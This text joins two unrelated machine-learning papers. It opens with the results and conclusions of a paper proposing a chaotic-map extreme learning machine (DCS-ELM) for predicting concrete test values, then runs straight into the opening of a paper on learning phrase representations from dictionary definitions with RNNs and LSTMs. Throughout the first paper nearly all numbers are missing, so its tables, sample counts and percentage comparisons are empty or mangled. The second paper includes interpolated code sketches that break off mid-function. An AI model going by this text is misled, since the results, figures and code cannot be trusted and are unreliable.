in the 10-k cross validation method, the data set is first randomly shuffled and then divided into 10 parts. each part is used once as the test data set while the remaining parts are used as the training set. with the 10-k cross validation method, more consistent results can be obtained because every sample in the data set is used as test data. a simple representation of the 10-k cross validation method is a 10 x 10 grid in which each row marks one part as test and the remaining nine parts as train, the test part shifting by one position from row to row.

evaluation metrics
the evaluation criteria used in the study are r-squared ($R^2$), root mean square error (rmse) and mean absolute error (mae). the equations of the evaluation criteria are expressed as follows:

$R^2 = 1 - \dfrac{\sum_{j} (t_j - o_j)^2}{\sum_{j} (t_j - \hat{t})^2}$

$\mathrm{RMSE} = \sqrt{\dfrac{1}{p} \sum_{j} (t_j - o_j)^2}$

$\mathrm{MAE} = \dfrac{1}{p} \sum_{i=1}^{p} |t_i - o_i|$

where $o$ are the experimental values, $t$ are the predicted values of the machine learning algorithms, $\hat{t}$ is the average of all experimental values and $p$ is the number of samples.

figure: distributions of chaotic maps. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent.

datasets
in this section, the data sets used to evaluate the performance of the proposed dcs-elm algorithm and the other algorithms are explained. first the sfrscc data set is explained, and then the public data sets are explained.

self-compacting steel fiber concrete
in the application of the proposed algorithm, a special type of concrete, self-compacting steel fiber concrete, is used. four different concrete tests were selected from the fresh and hardened concrete tests: the v-funnel, t and slump-flow tests used to determine fresh concrete performance, and the compressive strength test used to determine the performance of hardened concrete. the data set was selected because machine learning methods have not been applied to it before, the samples have the same number of input parameters while the effect of each parameter differs between experiments, there are not enough such data sets in the literature, and it is more difficult to obtain a successful performance with machine learning methods on this data compared to other data sets. the data sets used were obtained from our own experiments and from theses and articles in the literature.
data sets were used in the models designed for v-funnel, data sets in the model designed for t , data sets in the model designed for slump-flow, and data in the model designed for compressive strength. the data in table are obtained from the experimental studies and the studies in table are obtained from the literature. the input parameters in the data set are cement (c), silica fume+silica powder+stone fume (s), fly ash (fa), maximum aggregate size (dmax), fine aggregate (fi), coarse aggregate (ca), water (w), chemical additive (a), amount of steel fiber (stf), diameter of steel fiber (fd) and length of steel fiber (fd). the output parameters in the data set are v-funnel (vf), t , slump-flow (sf) and compressive strength (fc). silica fume, silica powder and stone fume are reduce the workability of the fresh concrete takes as group (altay, ulas & alyamac, ). the effect of this group on the performance of concrete that has been hardened before days is negligible. public datasets the energy, house and servo data sets obtained from public data set sharing platform uci are explained (dua & graff, ). energy energy data set consists of inputs and outputs. input values consist of relative compactness, surface area, wall area, roof area, overall height, orientation, glazing area and glazing area distrubution. output values consist of heating load and cooling load. it has been examined separately for two different output values. there are sample data in the data set created by considering the output variables of different buildings (tsanas & xifara, ). house in the house data set, between june and may , data from different regions is beyond the supply and demand circle. there are a total of sample data in the data set. table data from experiment, input and output parameters of sfrscc for v-funnel, t , slump-flow and compressive strength models. mix code c kg/m s kg/m dmax (mm) fi kg/m ca kg/m w l a l stf kg/m fd mm fl mm vf (s) t (s) sf (cm) fc (mpa) c- . . . . c- . . . . . c- . . . . . c- . . . . . c- . . . . c- . . – . . c- . . . . c- . . . – – – . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table data from literature, input and output parameters of sfrscc for v-funnel, t , slump-flow and compressive strength models. ref c kg/m s kg/m fa kg/m dmax (mm) fi kg/m ca kg/m w l a kg/m stf kg/m fd mm fl mm vf s t s sf cm fc mpa korkmaz ( ) . . . . . . . . nis ( ) . . . . . . rao & ravindra ( ) . . . . . . . . . . . . . bozkurt ( ) . . . . . . . kassimi ( ) . . . . . . . . tezel ( ) . . . . . – sahmaran & yaman ( ) . . . . . – sahmaran, yurtseven & yaman ( ) . . . . . . . corinaldesi & moriconi ( ) , . – gencel et al. ( ) . . . . . . . . . . . – korkut et al. ( ) . . . . . . . . . – berbergil ( ) . . . . – . . yıldırım, sertbaş & berbergil ( ) . . . . . – – . . dinç ( ) . . . – – el-dieb & taha ( ) . . – . – deeb ( ) . – – ouedraogo ( ) , . . . . – . . . . pająk & ponikiewski ( ) . . . – . . frazão et al. ( ) . . . – . . – torrijos, barragan & zerbino ( ) . – . – majdzadeh ( ) . . . . . . . – – – jansson et al. ( ) . . – – – long et al. ( ) . . . – – – . . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the input parameters of the data set consist of different parameters: transaction date, age, distance to the nearest mrt station, the number of convenience stores in the living circle on foot and the geographic coordinate (latitude and longitude). 
the exit value is the price of the house (yeh & hsu, ). servo there are sample data in the servo data set. the input parameters of the data set are engine, screw, pgain and vgain. output values constitute the rise time of the servomechanism. the dataset created by karl ulrich covers a nonlinear phenomenon (quinlan, , ). results and discussion in this study, the dcs-elm algorithm, which was proposed for the first time using chaotic maps, was tested in different regression datasets. in this section, first of all, the performances of dcs-elm and other algorithms proposed on public data sets were examined and compared. then, performances of dcs-elm and other algorithms in sfrscc datasets were examined and compared. finally, a general evaluation of dcs-elm and other algorithms proposed on different data sets was made according to the rmse value. performance experiment results on public data sets the proposed dcs-elm algorithm using different chaotic maps on different public data sets is compared with the, lr (altay et al., ), svr (altay et al., ), welm (ulas et al., ), kelm (ulas et al., ; yang et al., ) and basic elm algorithm (cao et al., ). lr and svr algorithms are used with basic property parameters. the number of input, output, activation function and hidden neuron used in dcs-elm, basic elm, welm and kelm are given in the tables and . the -k cross validation method was used to test the designed models. the basic elm, welm and kelm algorithms were run times and the r , rmse and mae values were averaged. table shows the results of basic elm, lr, svr, welm, kelm and dcs-elm algorithms for public data sets. a new approach for the sfrscc using dcs-elm sfrcscc’s fresh and hardened concrete experiments performances were predicted using the proposed dcs-elm algorithm using the basic elm algorithm and different chaotic maps. parameters used in elm and dcs-elms are taken exactly the same in all designed models in order to ensure a healthy comparison. the input, output, activation function and the number of hidden neurons of the basic elm algorithm, welm and dcs-elm are shown in table . kelm algorithm architecture shown in table . in order to compare the elm algorithm with the chaotic map-based elm algorithms, the elm algorithm was run times and the evaluation criteria were averaged. all designed models were tested using the -k cross validation test method. r , rmse and mae values were calculated separately for each model. altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in fig. , the elm algorithm of the v-funnel experiment and the prediction and experimental values of different dcs-elm algorithms are given, and fig. shows the differences between the prediction and experimental values. as it can be understood from fig. and fig. , elm algorithm using iterative maps showed the best performance. dcs-elm algorithm using chebyshev and logistic maps follow dcs-elm using iterative maps. figure shows the elm algorithm of the t experiment and the prediction and experimental values of different dcs-elm algorithms. figure shows the differences between prediction and experimental values. as seen in figs. and , the algorithms have shown similar performances to each other. logistic map-based dcs-elm algorithm table results of public datasets. em lr svr welm k = kelm k = elm k = dcs-elm chebyshev dcs-elm iterative dcs-elm logistic dcs-elm piecewise dcs-elm tent energy r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . 
energy r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . house r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . servo r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . table architecture of kelm. kernel parameter activation function output neuron input neuron energy rbf kernel energy rbf kernel house rbf kernel servo rbf kernel table architecture of elm, dcs-elm and welm. hidden neuron activation function output neuron input neuron energy sine energy sine house hardlim servo sigmoid altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ has succeeded in producing the best predictive values. the piecewise map based dcs-elm algorithm has performed very close to the logistic map based dcs-elm algorithm. in fig. , the elm algorithm of the slump-flow experiment and the prediction and experimental values of different dcs-elm algorithms are given and the differences between the prediction and experimental values are shown in fig. . as can be seen from figs. and , the most successful performance in the slump-flow experiment was shown by the dcs-elm algorithm using iterative map. the dcs-elm algorithm using piecewise map produced predictive values close to the dcs-elm algorithm using iterative map. tent and logistic map-based dcs-elm algorithm produced more distant values in predicted values than expected experimental values. figure shows the elm algorithm of the compressive strength test and the prediction and experimental values of different dcs-elm algorithms. figure shows the differences between prediction and experimental values. as can be seen from figs. and , the methods in the compressive strength test have produced predictive values that are not far from each other. the dcs-elm algorithm, which uses piecewise map, has managed to produce relatively better predictive values. r , rmse and mae values for basic elm and dcs-elm are given separately in table . in the v-funnel experiment, elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. chebyshev map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. iterative map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. logistic map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the piecewise map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. tent map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. table parameters of the elm, welm and dcs-elm for sfrscc. hidden neuron activation function output neuron input neuron vfunnel , hard limit t , hard limit slump-flow , hard limit fc , hard limit table parameters of the kelm for sfrscc. kernel parameter activation function output neuron input neuron vfunnel lin kernel t lin kernel slump-flow lin kernel fc lin kernel altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the t experiment, elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. chebyshev map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the iterative map-based dcs-elm algorithm obtained the values of . , . and . for r , rmse and mae values, respectively. 
logistic map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the piecewise map based dcs-elm algorithm obtained values of . , figure experimental and predictive values of dcs-elm algorithm in the v-funnel experiment. (a) chebyshev. (b) itaretive. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . and . for r , rmse and mae values, respectively. tent map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. in the slump-flow experiment, the elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. chebyshev map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. iterative map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. logistic map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the piecewise map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. tent map-based dcs-elm figure differences between the experimental and predictive values of dcs-elm algorithm in the v-funnel experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm obtained values of . , . and . for r , rmse and mae values, respectively. in the compressive strength experiment, elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. chebyshev map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the iterative map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. logistics map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae figure experimental and predictive values of dcs-elm algorithm in t experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ values, respectively. the piecewise map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. tent map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. figure shows the performances of elm and dcs-elm algorithms in different data sets according to the r value. in the v-funnel experiment, it is an iterative map-based dcs-elm algorithm that gives the best result according to the r evaluation criteria. this algorithm performed . % better than the basic elm algorithm, % better than the tent map based dcs-elm algorithm, . % better than the piecewise map based dcs-elm algorithm, . % better than the chebyshev map based dcs-elm algorithm and . % better than the logistic map based dcs-elm algorithm. figure differences between the experimental and predictive values of dcs-elm algorithm in the t experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. 
/fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the t experiment, it is the logistic map based dcs-elm algorithm that gives the best result according to the r evaluation criteria. this algorithm has performed . % better than chebyshev map based dcs-elm algorithm, . % better than the tent map based dcs-elm algorithm, . % better than the iterative map based dcs-elm algorithm, . % better than the basic elm algorithm and . % better than the piecewise map based dcs-elm algorithm. figure experimental and predictive values of dcs-elm algorithm in the slump-flow experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the slump-flow experiment it is the iterative map based dcs-elm algorithm that gives the best result according to the r evaluation criteria. this algorithm has performed . % better than the tent map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the logistic map-based dcs-elm algorithm, % better than the chebyshev map-based dcs-elm algorithm and . % better than the piecewise map-based dcs-elm algorithm. in the compressive strength experiment it is the iterative map based dcs-elm algorithm that gives the best result according to the r evaluation criteria. this algorithm has performed . % better than the basic elm algorithm, . % better than the tent map based dcs-elm algorithm, . % better than the logistic map based dcs-elm algorithm, . % better than chebyshev map based dcs-elm and . % better than the iterative map based dcs-elm algorithm. figure differences between the experimental and predictive values of dcs-elm algorithm in the slump-flow experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows the performances of elm and dcs-elm algorithms in different data sets according to the rmse value. in the v-funnel experiment, the iterative map- based dcs-elm algorithm, which gives the best performance according to the rmse evaluation criteria, is . % better than the logistic map-based dcs-elm algorithm, . % better than the tent map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the piecewise map-based dcs-elm algorithm and . % better than the chebyshev map-based dcs-elm algorithm. figure experimental and predictive values of dcs-elm algorithm in compressive strength test. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the t experiment, the logistic map-based dcs-elm algorithm, which gives the best performance according to the rmse evaluation criteria, is . % better than the tent map-based dcs-elm algorithm, . % better than the piecewise map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the iterative map-based dcs-elm algorithm and . % better than the chebyshev map-based dcs-elm algorithm. 
in the slump-flow experiment, the iterative map-based dcs-elm algorithm, which gives the best performance according to the rmse evaluation criteria, is . % better than the tent map-based dcs-elm algorithm, . % better than the logistic map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the chebyshev map-based dcs-elm algorithm and . % better than the piecewise map- based dcs-elm algorithm. figure differences between the experimental and predicted values of dcs-elm algorithm in compressive strength test. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the compressive strength experiment, the logistic map-based dcs-elm algorithm, which gives the best performance according to the rmse evaluation criteria, is . % better than the tent map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the iterative map-based dcs-elm algorithm, . % better than the piecewise map-based dcs-elm algorithm and . % better than the chebyshev map-based dcs-elm algorithm. figure shows the performances of elm and dcs-elm algorithms in different data sets according to the mae value. in the v-funnel experiment, the iterative map-based dcs-elm algorithm, which gives the best performance according to the mae evaluation criteria, is . % better than the tent map-based dcs-elm algorithm, . % better table comparison of the performances of elm and dcs-elm algorithms in sfrscc data sets. data sets evaluation metrics elm (k = ) dcs-elm (chebyshev) dcs-elm (iterative) dcs-elm (logistic) dcs-elm (piecewise) dcs-elm (tent) v-funnel r . . . . . . rmse . . . . . . mae . . . . . . t r . . . . . . rmse . . . . . . mae . . . . . . slump-flow r . . . . . . rmse . . . . . . mae . . . . . . fc r . . . . . . rmse . . . . . . mae . . . . . . figure comparison of elm and dcs-elm algorithms according to r value in experiments. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than the logistic map-based dcs-elm algorithm, . % better than the chebyshev map-based dcs-elm, . % better than the piecewise map-based dcs-elm algorithm and . % better than the basic elm algorithm. in the t experiment, the logistic map-based dcs-elm algorithm, which gives the best performance according to the mae evaluation criteria, is . % better than the piecewise map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the tent map-based dcs-elm, . % better than the iterative map-based dcs-elm algorithm and . % better than the chebyshev map-based dcs-elm algorithm. in the slump-flow experiment, the iterative map-based dcs-elm algorithm, which gives the best performance according to the mae evaluation criteria, is . % better figure comparison of elm and dcs-elm algorithms according to rmse value in experiments. full-size doi: . /peerj-cs. /fig- figure comparison of elm and dcs-elm algorithms according to the mae value in experiments. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than the logistic map-based dcs-elm algorithm, . 
% better than the basic elm algorithm, . % better than the tent map-based dcs-elm, . % better than the chebyshev map-based dcs-elm algorithm and . % better than the piecewise map- based dcs-elm algorithm. in the compressive strength experiment, the piecewise map-based dcs-elm algorithm, which gives the best performance according to the mae evaluation criteria, is . % better than the chebyshev map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the iterative map-based dcs-elm, . % better than the tent map-based dcs-elm algorithm and . % better than the logistic map-based dcs-elm algorithm. it has been demonstrated that the dcs-elm algorithm produces better results than the elm algorithm in all sfrscc data sets. general comparison of all data sets as a result of the study, it was observed that the use of chaotic maps in the elm algorithm increased the success performance in the sfrscc and public data sets. however, there is table results of all datasets. em lr svr welm k = kelm k = elm k = dcs-elm chebyshev dcs-elm iterative dcs-elm logistic dcs-elm piecewise dcs-elm tent energy r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . energy r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . house r . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . servo r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . vfunnel r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . t r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . slump-flow r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . fc r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ no clear superiority between five different maps. the performance rankings of chaotic maps vary according to the evaluation criteria and the type of data set. when it will be adapted to different data sets, it is recommended to determine the chaotic map by trial and error method. the results of all methods and data sets used in the article are given in table . table shows the success rankings of the algorithms used in different data sets. when the average values were taken according to different data sets, it was seen that the iterative chaotic map based dcs-elm method achieved the best average. piecewise map-based dcs-elm method took the second place. it has been observed that dcs-elm gives better results than lr, svr, welm and kelm algorithms. it has been observed that the dcs-elm method gives a much better performance as a percentage, especially in data sets where the elm method has a low performance rate. conclusions in this study, a novel method named dcs-elm is proposed to improve the elm algorithm. in this proposed method, different chaotic maps are used. these chaotic maps are chebyshev map, iterative map, logistic map, piecewise map and tent map. it has been shown that the performance of the dcs-elm algorithm changes according to the chaotic map used. the dcs-elm method proposed in this study has been tested in different data sets. the common parameters of the models designed in each data set are used the same. in addition, the test and training data sets used during the testing of the models were used the same. 
as a result of the study, it was observed that, thanks to the use of chaotic maps in the elm algorithm, the dcs-elm algorithm is more stable, generalises better as a problem solver and achieves higher performance. especially on the data sets where elm or the other algorithms showed poor performance, the dcs-elm algorithm was able to perform better than basic elm, kelm, welm, lr and svr. it has been shown that problems caused by randomly assigned weights, such as values accumulating in a narrow region or repeating, can be prevented by using chaotic maps, which allows the dcs-elm algorithm to reach its best performance faster. the proposed discrete-time chaotic systems extreme learning machine algorithm can be appropriately used in regression problems, and this novel discrete-time chaotic systems based machine learning algorithm can be effectively used on different complex data sets. the proposed methods are novel, and more detailed work can be done with parallel or distributed applications. in addition, further studies can be carried out by adapting the chaotic maps to different versions of the elm algorithm.

table : ranking of the algorithms according to the rmse value on each data set (energy, energy, house, servo, v-funnel, t, slump-flow and fc), together with the mean rank, for lr, svr, welm (k = ), kelm (k = ), elm (k = ) and the chebyshev, iterative, logistic, piecewise and tent map-based dcs-elm algorithms.

additional information and declarations

funding
the authors received no funding for this work.

competing interests
the authors declare that they have no competing interests.

author contributions
osman altay conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
mustafa ulas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
kursat esat alyamac conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability: datasets and codes are available at github: https://github.com/mustafaulas/dcs-elm. data is also available at the uci machine learning repository:
- house dataset: https://archive.ics.uci.edu/ml/datasets/real+estate+valuation+data+set
- servo dataset: https://archive.ics.uci.edu/ml/datasets/servo
- energy dataset: https://archive.ics.uci.edu/ml/datasets/energy+efficiency#

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
learning to understand phrases by embedding the dictionary

felix hill, computer laboratory, university of cambridge, felix.hill@cl.cam.ac.uk
kyunghyun cho*, courant institute of mathematical sciences and centre for data science, new york university, kyunghyun.cho@nyu.edu
anna korhonen, department of theoretical and applied linguistics, university of cambridge, alk @cam.ac.uk
yoshua bengio, cifar senior fellow, université de montréal, yoshua.bengio@umontreal.ca
* work mainly done at the university of montreal.

abstract
distributional models that learn rich semantic word representations are a success story of recent nlp research. however, developing models that learn useful representations of phrases and sentences has proved far harder. we propose using the definitions found in everyday dictionaries as a means of bridging this gap between lexical and phrasal semantics. neural language embedding models can be effectively trained to map dictionary definitions (phrases) to (lexical) representations of the words defined by those definitions. we present two applications of these architectures: reverse dictionaries that return the name of a concept given a definition or description and general-knowledge crossword question answerers. on both tasks, neural language embedding models trained on definitions from a handful of freely-available lexical resources perform as well or better than existing commercial systems that rely on significant task-specific engineering. the results highlight the effectiveness of both neural embedding architectures and definition-based training for developing models that understand phrases and sentences.

introduction
much recent research in computational semantics has focussed on learning representations of arbitrary-length phrases and sentences. this task is challenging partly because there is no obvious gold standard of phrasal representation that could be used in training and evaluation. consequently, it is difficult to design approaches that could learn from such a gold standard, and also hard to evaluate or compare different models.
in this work, we use dictionary definitions to address this issue. the composed meaning of the words in a dictionary definition (a tall, long-necked, spotted ruminant of africa) should correspond to the meaning of the word they define (giraffe). this bridge between lexical and phrasal semantics is useful because high quality vector representations of single words can be used as a target when learning to combine the words into a coherent phrasal representation.
this approach still requires a model capable of learning to map between arbitrary-length phrases and fixed-length continuous-valued word vectors. for this purpose we experiment with two broad classes of neural language models (nlms): recurrent neural networks (rnns), which naturally encode the order of input words, and simpler (feed-forward) bag-of-words (bow) embedding models. prior to training these nlms, we learn target lexical representations by training the word vec software (mikolov et al., ) on billions of words of raw text.
we demonstrate the usefulness of our approach by building and releasing two applications. the first is a reverse dictionary or concept finder: a system that returns words based on user descriptions or definitions (zock and bilac, ). reverse dictionaries are used by copywriters, novelists, translators and other professional writers to find words for notions or ideas that might be on the tip of their tongue. for instance, a travel-writer might look to enhance her prose by searching for examples of a country that people associate with warm weather or an activity that is mentally or physically demanding. we show that an nlm-based reverse dictionary trained on only a handful of dictionaries identifies novel definitions and concept descriptions comparably or better than commercial systems, which rely on significant task-specific engineering and access to much more dictionary data. moreover, by exploiting models that learn bilingual word representations (vulic et al., ; klementiev et al., ; hermann and blunsom, ; gouws et al., ), we show that the nlm approach can be easily extended to produce a potentially useful cross-lingual reverse dictionary.
the second application of our models is as a general-knowledge crossword question answerer. when trained on both dictionary definitions and the opening sentences of wikipedia articles, nlms produce plausible answers to (non-cryptic) crossword clues, even those that apparently require detailed world knowledge. both bow and rnn models can outperform bespoke commercial crossword solvers, particularly when clues contain a greater number of words. qualitative analysis reveals that nlms can learn to relate concepts that are not directly connected in the training data and can thus generalise well to unseen input. to facilitate further research, all of our code, training and evaluation sets (together with a system demo) are published online with this paper (https://www.cl.cam.ac.uk/~fh /).

neural language model architectures
the first model we apply to the dictionary-based learning task is a recurrent neural network (rnn). rnns operate on variable-length sequences of inputs; in our case, natural language definitions, descriptions or sentences. rnns (with lstms) have achieved state-of-the-art performance in language modelling (mikolov et al., ), image caption generation (kiros et al., ) and approach state-of-the-art performance in machine translation (bahdanau et al., ). during training, the input to the rnn is a dictionary definition or sentence from an encyclopedia. the objective of the model is to map these defining phrases or sentences to an embedding of the word that the definition defines.
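the training signal is therefore a set of (definition, target word embedding) pairs. purely to make that concrete, here is one way such pairs might be assembled from pre-trained word vec vectors using gensim's KeyedVectors; the file name, the toy one-entry dictionary and the naive whitespace tokenisation are hypothetical choices for illustration, not the authors' pipeline.

from gensim.models import KeyedVectors

# hypothetical pre-trained vectors file and a toy dictionary, for illustration only
vectors = KeyedVectors.load_word2vec_format("pretrained_vectors.bin", binary=True)
dictionary = {"giraffe": ["a tall, long-necked, spotted ruminant of africa"]}

training_pairs = []
for word, definitions in dictionary.items():
    if word in vectors:                      # skip words outside the embedding vocabulary
        for definition in definitions:
            tokens = definition.split()      # naive tokenisation
            training_pairs.append((tokens, vectors[word]))  # (input phrase, target embedding)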
the target word embeddings are learned independently of the rnn weights, using the word vec software (mikolov et al., ). the set of all words in the training data constitutes the vocabulary of the rnn. for each word in this vocabulary we randomly initialise a real-valued vector (input embedding) of model parameters. the rnn 'reads' the first word in the input by applying a non-linear projection of its embedding $v_1$, parameterised by input weight matrix $W$ and $b$, a vector of biases:
$a_1 = \phi(W v_1 + b)$,
yielding the first internal activation state $a_1$. in our implementation, we use $\phi(x) = \tanh(x)$, though in theory $\phi$ can be any differentiable non-linear function. subsequent internal activations (after time-step $t$) are computed by projecting the embedding of the $t$th word and using this information to 'update' the internal activation state:
$a_t = \phi(U a_{t-1} + W v_t + b)$.
as such, the values of the final internal activation state units $a_N$ are a weighted function of all input word embeddings, and constitute a 'summary' of the information in the sentence.

long short term memory
a known limitation when training rnns to read language using gradient descent is that the error signal (gradient) on the training examples either vanishes or explodes as the number of time steps (sentence length) increases (bengio et al., ). consequently, after reading longer sentences the final internal activation $a_N$ typically retains useful information about the most recently read (sentence-final) words, but can neglect important information near the start of the input sentence. lstms (hochreiter and schmidhuber, ) were designed to mitigate this long-term dependency problem.
at each time step $t$, in place of the single internal layer of units $a$, the lstm rnn computes six internal layers $i^w$, $g^i$, $g^f$, $g^o$, $h$ and $m$. the first, $i^w$, represents the core information passed to the lstm unit by the latest input word at $t$. it is computed as a simple linear projection of the input embedding $v_t$ (by input weights $W^w$) and the output state of the lstm at the previous time step $h_{t-1}$ (by update weights $U^w$):
$i^w_t = W^w v_t + U^w h_{t-1} + b^w$.
the layers $g^i$, $g^f$ and $g^o$ are computed as weighted sigmoid functions of the input embeddings, again parameterised by layer-specific weight matrices $W$ and $U$:
$g^s_t = \frac{1}{1 + \exp(-(W^s v_t + U^s h_{t-1} + b^s))}$,
where $s$ stands for one of $i$, $f$ or $o$. these vectors take values on $[0, 1]$ and are often referred to as gating activations. finally, the internal memory state $m_t$ and new output state $h_t$ of the lstm at $t$ are computed as
$m_t = i^w_t \odot g^i_t + m_{t-1} \odot g^f_t$
$h_t = g^o_t \odot \phi(m_t)$,
where $\odot$ indicates elementwise vector multiplication and $\phi$ is, as before, some non-linear function (we use tanh). thus, $g^i$ determines to what extent the new input word is considered at each time step, $g^f$ determines to what extent the existing state of the internal memory is retained or forgotten in computing the new internal memory, and $g^o$ determines how much this memory is considered when computing the output state at $t$.
the sentence-final memory state of the lstm, $m_N$, a 'summary' of all the information in the sentence, is then projected via an extra non-linear projection (parameterised by a further weight matrix) to a target embedding space. this layer enables the target (defined) word embedding space to take a different dimension to the activation layers of the rnn, and in principle enables a more complex definition-reading function to be learned.
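to make the reading procedure above concrete, the following is a minimal numpy sketch of a single lstm step and of reading one definition with it; the parameter packing, the shapes and the function names are our own choices for illustration rather than the paper's theano implementation.

import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def lstm_step(v_t, h_prev, m_prev, p):
    # v_t: input word embedding; h_prev, m_prev: previous output and memory states;
    # p: dict of weight matrices W_*, U_* and biases b_* for layers 'w', 'i', 'f', 'o'
    i_w = p["W_w"] @ v_t + p["U_w"] @ h_prev + p["b_w"]           # core input information
    g_i = sigmoid(p["W_i"] @ v_t + p["U_i"] @ h_prev + p["b_i"])  # input gate
    g_f = sigmoid(p["W_f"] @ v_t + p["U_f"] @ h_prev + p["b_f"])  # forget gate
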